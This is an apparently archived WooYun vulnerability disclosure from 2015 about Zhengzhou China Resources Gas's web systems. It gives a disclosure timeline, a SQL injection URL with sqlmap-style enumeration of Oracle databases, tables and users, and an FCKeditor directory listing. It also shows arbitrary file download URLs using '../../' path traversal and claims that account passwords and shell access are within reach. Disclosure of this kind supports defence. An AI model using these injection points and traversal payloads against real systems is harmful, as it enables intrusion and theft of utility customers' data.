乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-13: 细节已通知厂商并且等待厂商处理中 2015-03-18: 厂商已经确认,细节仅向厂商公开 2015-03-28: 细节向核心白帽子及相关领域专家公开 2015-04-07: 细节向普通白帽子公开 2015-04-17: 细节向实习白帽子公开 2015-04-27: 细节向公众公开
华润燃气今天没事查下看看要不要交点燃气费 然后。。。
郑州华润燃气http://www.zzcrcgas.com1、内网映射的注入http://218.28.4.60:8088/anquan_unit/list.aspx?sid=531
available databases [21]:[*] CTXSYS[*] DBSNMP[*] DMSYS[*] EXFSYS[*] HNZRNW[*] HR[*] IX[*] MDSYS[*] OE[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] PM[*] SCOTT[*] SH[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDBDatabase: HNZRNW+---------------------+---------+| Table | Entries |+---------------------+---------+| T_LOG | 18836 || T_INFO | 6812 || T_INFO_BAK | 5945 || T_STAT_DAY | 3848 || T_MAGAZINE | 2559 || T_BIAOZHUN | 752 || EQUIPMENT_INFO | 717 || T_LANMU | 314 || T_TAISHI_INFO | 298 || T_XIANSHIQI_INFO | 279 || EXCHTMPTB | 266 || T_LANMU_MODULE | 262 || T_STAT_MONTH | 253 || T_DICT | 192 || T_DAYINJI_INFO | 141 || EXCHTMPTBEX | 120 || T_STAT_YEAR | 79 || T_DEAL_INFO | 57 || T_JOURNAL | 50 || T_ORDER_PRODUCT | 45 || T_USER_SYS | 43 || USER_ROLE_INFO | 43 || T_DEPT | 38 || T_RESEARCH_BBS | 37 || T_USER | 26 || T_MEMBER | 20 || T_RESEARCH_ITEM | 20 || T_PINPAI_INFO | 18 || T_MODULE | 17 || T_ORDER_INFO | 17 || T_YWTITLE_PIC | 16 || T_BIJIBEN_INFO | 15 || T_REPAIR | 12 || MODEL_INFO | 9 || T_SAOMIAOYI_INFO | 9 || T_UNIT | 9 || T_REPAIR_RESULT | 8 || T_SOFT_DOWN | 7 || T_TELL | 7 || T_AD | 6 || T_PRODUCT | 6 || T_RESEARCH_DISC | 6 || T_LINK | 5 || T_REPORT | 5 || T_GUFEN_DATA | 4 || ROLE_INFO | 3 || T_PRODUCT_ATTENTION | 3 || EXJOBTB | 2 || T_BOOK | 2 || T_FLOW_STEP | 2 || T_RESEARCH_TITLE | 2 || T_UNIT1 | 2 || T_USER1 | 2 || EXTMPTB | 1 || T_IP | 1 || T_TAN | 1 || YW_MQYDLR200212 | 1 || YW_WXF2004 | 1 |+---------------------+---------+database management system users [28]:[*] ANONYMOUS[*] BI[*] CTXSYS[*] DBSNMP[*] DIP[*] DMSYS[*] EXFSYS[*] HNZRNW[*] HR[*] IX[*] MDDATA[*] MDSYS[*] MGMT_VIEW[*] OE[*] OLAPSYS[*] ORDPLUGINS[*] ORDSYS[*] OUTLN[*] PM[*] SCOTT[*] SH[*] SI_INFORMTN_SCHEMA[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDBDatabase: SH+----------------------------+---------+| Table | Entries |+----------------------------+---------+| SALES | 918843 || COSTS | 82112 || CUSTOMERS | 55500 || FWEEK_PSCAT_SALES_MV | 11266 || SUPPLEMENTARY_DEMOGRAPHICS | 4500 || TIMES | 1826 || PROMOTIONS | 503 || PRODUCTS | 72 || CAL_MONTH_SALES_MV | 48 || COUNTRIES | 23 || DR$SUP_TEXT_IDX$R | 22 || CHANNELS | 5 |+----------------------------+---------+无力吐槽
2、fck配置不当 遍历
ok3、任意文件下载 filename关键字
http://218.28.4.60:8088/news/download.aspx?filename=../../Fnews/download.aspxhttp://218.28.4.60:8088/anquan_unit/download.aspx?filename=../../anquan_unit/download.aspx
ok缴费或者查询接口 http://www.zzcrcgas.com/page/form/zxjf.jsp拿到账户密码 深入可shell 危害郑州整个燃气用户数据。
···
改~
危害等级:高
漏洞Rank:11
确认时间:2015-03-18 13:29
暂无